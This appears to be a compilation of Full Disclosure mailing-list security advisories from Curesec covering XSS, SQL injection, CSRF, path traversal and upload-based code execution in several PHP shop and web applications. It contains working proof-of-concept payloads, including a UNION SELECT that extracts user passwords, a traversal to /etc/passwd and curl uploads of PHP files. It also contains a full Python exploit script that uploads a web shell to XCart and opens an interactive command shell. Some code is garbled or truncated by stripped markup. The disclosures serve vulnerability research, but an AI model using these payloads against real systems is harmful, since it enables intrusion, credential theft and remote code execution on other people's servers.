http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/info.php?faqs&faqs_id='">alert(1)
Code
templates/bootstrap/content/info/faqs.php:70
if(question.getParent().id == 'faq') {
question.getElement('i').set('class', 'icon-minus');
question.getNext().setStyle('display', '');
}
4. XSS 2
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/checkout.php?checkout&view='">alert(1)
Code
templates/bootstrap/content/checkout/checkout.php:182
view: '',
5. Solution
This issue has not been fixed by the vendor
6. Report Timeline
09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/TomatoCart-v11861-XSS-89.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] TomatoCart v1.1.8.6.1: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:TomatoCart v1.1.8.6.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: supp...@tomatocart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview TomatoCart has multiple locations where the upload of images is allowed. In two of these locations, the file type and extension of the uploaded file are not checked, which leads to code execution. Please note that an admin account with at least some privileges is required to exploit this issue. 3. Code Execution 1 CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading a new slide image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution. The rights needed are Content -> Slide Images. Proof of Concept curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=1106460043' \ -b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \ --data-binary $'--1106460043\x0d\x0aContent-Disposition: form-data; name=\"image1\"; filename=\"test2.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0ahttp://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php' 3. Code Execution 2 CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading a new product image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution. The rights needed are Content -> Products. Proof of Concept curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=1775010584' \ -b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \ --data-binary $'--1775010584\x0d\x0aContent-Disposition: form-data; name=\"APC_UPLOAD_PROGRESS\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a--1775010584\x0d\x0aContent-Disposition: form-data; name=\"UPLOAD_IDENTIFIER\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a--1775010584\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a4194304\x0d\x0a--1775010584\x0d\x0aContent-Disposition: form-data; name=\"ext-gen4881\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0ahttp://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php?module=products&action=upload_image' 5. Solution This issue has not been fixed by the vendor 6. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/TomatoCart-v11861-Code-Execution-88.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XCart 5.2.6: Code Execution Exploit
#!/usr/local/bin/python
# Exploit for XCart 5.2.6 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH
import sys
import re
import requests # requires requests lib
if len(sys.argv) != 4:
exit("usage: python " + sys.argv[0] + " http://example.com/xcart/
ad...@example.com admin")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
loginPath = "/admin.php?target=login"
fileManagerPath = "/admin.php?target=logo_favicon"
shellFileName = "404.php"
shellContent = "GIF89a;"
def login(requestSession, url, username, password):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)"
class', csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
postData = {"target": "login", "action": "login", "xcart_form_id":
csrfToken, "login": username, "password": password}
loginResult = requestSession.post(url, data = postData).text
return "Invalid login or password" not in loginResult
def upload(requestSession, url, fileName, fileContent):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('SimpleCMS" />\n', csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
filesData = {"logo": (fileName, fileContent)}
postData = {"target": "logo_favicon", "action": "update", "page":
"CDev\SimpleCMS", "xcart_form_id": csrfToken}
uploadResult = requestSession.post(url, files = filesData, data = postData)
return "The data has been saved successfully" in uploadResult.text
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text.replace("GIF89a;", ""))
command = raw_input("$ ")
requestSession = requests.session()
if login(requestSession, url + loginPath, username, password):
print("successful: login")
else:
exit("ERROR: Incorrect username or password")
if upload(requestSession, url + fileManagerPath, shellFileName, shellContent):
print("successful: file uploaded")
else:
exit("ERROR: could not upload file")
runShell(url + shellFileName + "?x=")
Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Code-Execution-Exploit-87.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XCart 5.2.6: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:XCart 5.2.6 Fixed in:5.2.7 Fixed Version Link: https://www.x-cart.com/xc5kit Vendor Contact: supp...@x-cart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 11/04/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description When uploading a favicon (http://localhost/anew/xcart/admin.php?target= logo_favicon), there is no check as to what type or extension the file has. This allows an attacker that gained admin credentials to upload a PHP file and thus gain code execution. 3. Solution To mitigate this issue please upgrade at least to version 5.2.7: https://www.x-cart.com/xc5kit Please note that a newer version might already be available. 4. Report Timeline 08/13/2015 Informed Vendor about Issue 09/03/2015 Vendor Requests more time 10/19/2015 Vendor releases fix 11/04/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/XCart-526-Code-Execution-86.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XCart 5.2.6: Path Traversal
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:XCart 5.2.6
Fixed in:5.2.7
Fixed Version Link: https://www.x-cart.com/xc5kit
Vendor Contact: supp...@x-cart.com
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 11/04/2015
Release mode:Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Arbitrary File Download
Description
When downloading a file, the input is not properly protected against directory
traversal, which makes it possible to download arbitrary files.
Please note that admin credentials are required.
Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php
POST:
path=/////////////////..etc/passwd&name=download.txt
Code
/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10
$path=joinPaths($root,$upload_dir,$_POST['path']);
$path=str_replace(LC_DS . '..', '', $path);
$name=$_POST['name'];
header('Pragma: private');
header('Cache-control: private, must-revalidate');
header("Content-Type: application/octet-stream");
header("Content-Length: " .(string)(filesize($path)) );
header('Content-Disposition: attachment; filename="'.($name).'"');
readfile($path);
3. List Directories
Description
It is possible to list the directories contained by any directory due to a
directory traversal vulnerability via the fldr POST argument. This may be used
to gather information about the target system.
Please note that admin credentials are required.
Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../
4. Solution
To mitigate this issue please upgrade at least to version 5.2.7:
https://www.x-cart.com/xc5kit
Please note that a newer version might already be available.
5. Report Timeline
08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XCart 5.2.6: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:XCart 5.2.6 Fixed in:5.2.7 Fixed Version Link: https://www.x-cart.com/xc5kit Vendor Contact: supp...@x-cart.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 11/04/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There are multiple XSS vulnerabilities in the dialog.php file. This allows an attacker to execute arbitrary JavaScript in the context of the browser of a victim if the victim clicks on an attacker supplied link or visits an attacker controlled website. With this, it is possible to bypass CSRF protection and thus do anything the victim can do, inject a JavaScript keylogger, or perform phishing attacks. 3. Proof of Concept http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?editor=";>alert(1)&lang=">alert(2)&field_id=">alert(3)&fldr=">alert(4)&type=">alert(5) 4. Solution To mitigate this issue please upgrade at least to version 5.2.7: https://www.x-cart.com/xc5kit Please note that a newer version might already be available. 5. Report Timeline 08/13/2015 Informed Vendor about Issue 09/03/2015 Vendor Requests more time 10/19/2015 Vendor releases fix 11/04/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/XCart-526-XSS-84.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQLiteManager 1.2.4: Multiple XSS
SQLiteManager 1.2.4: Multiple XSS Security Advisory – Curesec Research Team 1. Introduction Affected Product: SQLiteManager 1.2.4 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: sqlitemana...@gmail.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public:10/07/2015 Release mode: Full Disclosure CVE:n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There are multiple XSS vulnerabilities in SQLiteManager 1.2.4. With this, it is possible to steal cookies, bypass CSRF protection, or inject JavaScript keyloggers. 3. Proof of Concept http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&function=";>alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&table=";>alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&trigger=";>alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&view=";>alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&action=browseItem&DisplayQuery=alert(1) http://localhost/SQLiteManager-1.2.4/main.php?dbsel=1&table=t1&action=insertElement¤tPage=0'">alert(1) 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public 6. Blog Reference: http://blog.curesec.com/article/blog/SQLiteManager-124-Multiple-XSS-67.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] TheHostingTool 1.2.6: Multiple XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:TheHostingTool 1.2.6
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: https://thehostingtool.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Description
There are two reflected and one persistent XSS in TheHostingTool 1.2.6. With
this, it is possible to bypass CSRF protection, inject JavaScript keyloggers,
or perform phishing attacks.
3. Details
Reflected XSS 1
Proof of Concept:
http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=notice&message=alert(1)&status
Code:
includes/ajax.php
function notice() {
global $style;
if(isset($_REQUEST['status']) and isset($_REQUEST['message'])) {
if($_REQUEST['status'] == "good") {
$status = true;
} else {
$status = false;
}
echo $style->notice($status, $_REQUEST['message']);
}
return true;
}
includes/class_style.php
public function notice($good, $message) {
if($good) {
//Cool! Everything's OK.
$color = "green";
}
else {
//Oh no! It's a bad message!
$color = "red";
}
$notice = '';
$notice .= $message;
$notice .= '';
return $notice;
}
Reflected XSS 2
Proof of Concept:
http://localhost//ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid=";>alert(1)
Code:
invoices.php:
class page {
public function content(){ # Displays the page
global $style, $db, $main, $invoice;
if(isset($_GET['iid']) and isset($_GET['pay'])){
$invoice->set_paid($_GET['iid']);
echo "Invoice
#{$_GET['iid']} marked as paid. Undo this
action";
}
elseif(isset($_GET['iid']) and
isset($_GET['unpay'])){
$invoice->set_unpaid($_GET['iid']);
echo "Invoice
{$_GET['iid']} marked as unpaid. Undo this
action";
}
Persistent XSS
Proof of Concept:
1. Create a new order here: http://localhost/ecommerce/THTv1.2.6/order/
2. When asked for a domain, enter: http://ex.alert(1).com
3. visit http://localhost/ecommerce/THTv1.2.6/admin/?page=logs or http://
localhost/ecommerce/THTv1.2.6/admin/?page=users&sub=search&do=USERID
4. Solution
This issue has not been fixed
5. Report Timeline
09/07/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/TheHostingTool-126-Multiple-XSS-78.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] TheHostingTool 1.2.6: Multiple SQL Injection
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:TheHostingTool 1.2.6
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: https://thehostingtool.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Description
There are three SQL Injections in the admin area of TheHostingTool 1.2.6.
The problem is that the defense against SQL Injection depends in part on the
global GET and POST variables being sanitized using mysql_real_escape_string if
accessed via postvar or getvar.
This makes them relatively safe to use in a query if the parameter is
surrounded by quotes. But for places where the parameter is not surrounded by
quotes, this will not prevent SQL injection.
Please note that admin credentials are required for all SQL injections shown
here.
3. Details
SQL Injection 1
The POST value "type" is used as the column name in a WHERE clause when using
the ajax search. Encoding single quotes does not prevent SQL injection in this
case.
It should also be noted that letting the user choose the column of a LIKE query
on a user table is not a good idea in general, as it will be easy to iterate
passwords this way.
Proof of Concept:
POST http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=search
type=user` %3D 1 union all select
1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
from tht_users %23&value=test
Code:
includes/ajax.php
public function search() {
global $main, $db, $style;
if($_SESSION['logged']) {
//echo '
[FD] TheHostingTool 1.2.6: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:TheHostingTool 1.2.6
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: https://thehostingtool.com/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Description
Themes can be uploaded via a zip file by an admin. The uploader checks the
validity of each file with a blacklist.
The blacklist misses at least two file types that will lead to code execution:
Any file with the extension .pht - which will be executed by most default
Apache configuration - and the .htaccess file - which, if parsed by the server,
will allow code execution with files with arbitrary extension. It is
recommended to use a whitelist instead of a blacklist.
Please note that admin credentials are required to exploit this issue.
3. Code
lof.php
if(preg_match('/^.+\.((?:php[3-5]?)|(?:cgi)|(?:pl)|(?:phtml))$/i',
basename($stat['name']), $regs2)) {
$errors[] = strtoupper($regs2[1]) . ' is not a valid file type in a theme zip.';
$insecureZip = true;
break;
}
4. Solution
This issue has not been fixed
5. Report Timeline
09/07/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/TheHostingTool-126-Code-Execution-75.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Quick.Cart 6.6: Multiple XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Quick.Cart 6.6
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Contact: i...@opensolution.org
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode:Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Description
Quick.Cart 6.6 is vulnerable to multiple reflected XSS attacks. With this, it
is possible to inject JavaScript keylogger or perform phishing attacks.
The vulnerabilities are all in the admin.php file. To add security through
obscurity, Quick.Cart does suggest to rename this file, which would make it
more difficult to exploit these vulnerabilities. The renaming is not mandatory.
The vulnerabilities detailed below depend on the fact that the main entry
points for users and admins contains a call to extract:
index.php
extract( $_GET );
admin.php
extract( $_GET );
With this, it is possible to overwrite or set any variable. Because of this, it
is not considered best-practice to pass user input to extract.
The SESSION variable can not be set by an attacker, because session_start is
called after extract, but variables such as SERVER or COOKIE and undefined
variables can be set.
This call also makes it possible to send POST requests via GET, making the
exploitation of for example CSRF easier. It may have further negative effects
as well.
3. Details
XSS 1
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iStatus=";>alert(1)
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iProducts=";>alert('xss')
Code:
templates/admin/orders.php
XSS 2
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=lang-translations&sLanguage=alert(1)
Code:
templates/admin/languages.php
XSS 3
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_COOKIE[sLogin]=";
autofocus onfocus="alert('xss')
Code:
common-admin.php
$content = '
AddOnload( cursor );
'.$lang['Login'].':'.$lang['Password'].':';
XSS 4
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_SERVER[HTTP_HOST]=";>alert(1)&_SERVER[SCRIPT_FILENAME]=/var/www/ecommerce/Quick.Cart_v6.6/admin.php
Please note that the SCRIPT_FILENAME must be set correctly, as it's used as the
name of the session key and overwriting one SERVER value leads to the deletion
of all other SERVER values.
Code:
core/libraries/trash.php
$GLOBALS['lang']['Language'] .= 'http://opensolution.org/news,.html?sUrl='.$_SERVER['HTTP_HOST'].'"
style="display:none;">';
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/07/2015 Informed Vendor about Issue
10/01/2015 Reminded Vendor of release date
10/01/2015 Vendor does not plan on releasing a fix, because the optional rename
of the admin file may mitigate this issue already
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/QuickCart-66-Multiple-XSS-74.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Quick.Cart 6.6: CSRF
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Quick.Cart 6.6
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Contact: i...@opensolution.org
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Description
None of the requests of Quick.Cart 6.6 are protected from CSRF. This means that
an attacker can perform actions for a logged in user by getting them to visit a
website with specifically crafted HTML and JavaScript while logged in.
The interesting Forms are all in the admin.php file. To add security through
obscurity, Quick.Cart does suggest to rename this file, which would make it
more difficult to exploit these vulnerabilities. The renaming is not mandatory.
The vulnerability can be exploited via GET or POST because of a call to
extract: extract( $_GET );
3. Proof of Concept
Change Admin Password:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config";
method="POST">
document.createElement('form').submit.call(document.getElementById('myform'));
Or via GET:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config&_POST[sOption]=save%20%26raquo%3B&_POST[login]=admin&_POST[pass]=123&_POST[submit]=Submit%20request
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/07/2015 Informed Vendor about Issue
10/01/2015 Reminded Vendor of release date
10/01/2015 Vendor does not plan on releasing a fix, because the optional rename
of the admin file may mitigate this issue already
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/QuickCart-66-CSRF-73.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CubeCart 6.0.7: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:CubeCart 6.0.7
Fixed in:6.0.8
Fixed Version Link: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip
Vendor Contact: sa...@cubecart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode:Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Reflected XSS
Description
The search echoes a keyword it retrieves via GET inside HTML tags. It removes
HTML tags from the keyword, but it does not encode quotes, which makes it
possible to break out of the context of the current attribute and add new
attributes. An attacker can use attributes such as onmouseover to execute
JavaScript.
To execute the code, the victim needs to hover over the title image, which an
attacker may for example achieve via ClickJacking.
Proof of Concept
http://localhost/ecommerce/CubeCart-6.0.6/search.html?search[keywords]=";
onmouseover="alert('xsstest')" foo="&_a=category
3. Persistent XSS
Description
The page to edit user-submitted reviews echoes user input inside HTML input
tags without encoding quotes, which makes it possible to break out of the
context of the current attribute and add new attributes.
An attacker can use attributes such as onfocus to execute JavaScript. In
combination with autofocus, a victim does not need to actually interact with
the input field for the code to execute.
Proof of Concept
1. Write a review here: http://localhost/ecommerce/CubeCart-6.0.6/
test-category/test-product.html#reviews_write
2. use as name or title: " autofocus onfocus="alert(1)" foo="
3. Visit the review-edit site: http://localhost/ecommerce/CubeCart-6.0.6/
admin.php?_g=products&node=reviews&edit=REVIEWID
4. Solution
To mitigate this issue please upgrade at least to version 6.0.8:
https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip
Please note that a newer version might already be available.
5. Report Timeline
09/07/2015 Informed Vendor about Issue
10/05/2015 Vendor releases fix
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/CubeCart-607-XSS-71.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CubeCart 6.0.7: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:CubeCart 6.0.7 Fixed in:6.0.8 Fixed Version Link: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip Vendor Contact: sa...@cubecart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description When importing a language from a language file, it is only checked that the file contains valid XML, but the original extension of the file is kept, which makes it possible to gain code execution by uploading a file containing PHP code. Please note that admin credentials are required. 3. Proof of Concept Create a language file with valid XML and a file name like en.php with PHP code inside: My Language utf-8 1.0.0 5.0.0a 5.1.* GBP ltr Upload the file here: http://localhost/ecommerce/CubeCart-6.0.6/admin.php?_g= settings&node=language#lang_import And visit it to execute the code: http://localhost/ecommerce/CubeCart-6.0.6/ language/en.php?x=ls%20-alF 4. Solution To mitigate this issue please upgrade at least to version 6.0.8: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip Please note that a newer version might already be available. 5. Report Timeline 09/07/2015 Informed Vendor about Issue 10/05/2015 Vendor releases fix 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/CubeCart-607-Code-Execution-70.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Supercali Event Calendar 1.0.8: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Supercali Event Calendar 1.0.8
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://supercali.inforest.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
There is an XSS vulnerability via the "id" GET parameter when editing a group
in Supercali Event Calendar 1.0.8. With this, it is possible to steal cookies
or inject JavaScript keyloggers.
3. Proof of Concept
http://supercali-1.0.8/supercali-1.0.8/edit_groups.php?mode=edit_group&id=alert('xss')
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/01/2015 Informed Vendor about Issue (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/Supercali-Event-Calendar-108-XSS-69.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Supercali Event Calendar 1.0.8: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Supercali Event Calendar 1.0.8 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://supercali.inforest.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description None of the forms of Supercali Event Calendar 1.0.8 have CSRF protection, which means that an attacker can perform actions for the victim if the victim visits an attacker controlled site while logged in. 3. Proof of Concept Add a User: http://localhost/supercali-1.0.8/supercali-1.0.8/admin_actions.php"; method="POST"> document.myform.submit(); 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Supercali-Event-Calendar-108-CSRF-68.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] OpenCart 2.0.3.1: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:OpenCart 2.0.3.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: https://www.opencart.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description While CSRF protection exists for the actions of an admin, it does not exist for customers. This means that customer accounts can be compromised by an attacker if the victim visits an attacker controlled website while logged in. This issue was already discovered in 2013 by Saadat Ullah, but new versions of OpenCart are still vulnerable as no fix has been released. 3. Proof of Concept Change Password: http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password"; > document.myform.submit(); Change profile information, including email address, which is used when logging in: http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit"; > document.myform.submit(); 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/ Informed Vendor about Issue (no reply) 2015 09/22/ Reminded Vendor of disclosure date 2015 09/23/ Vendor points out that issue is already known, and that they do not 2015 plan on releasing a fix 10/07/ Disclosed to public 2015 Blog Reference: http://blog.curesec.com/article/blog/OpenCart-2031-CSRF-66.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
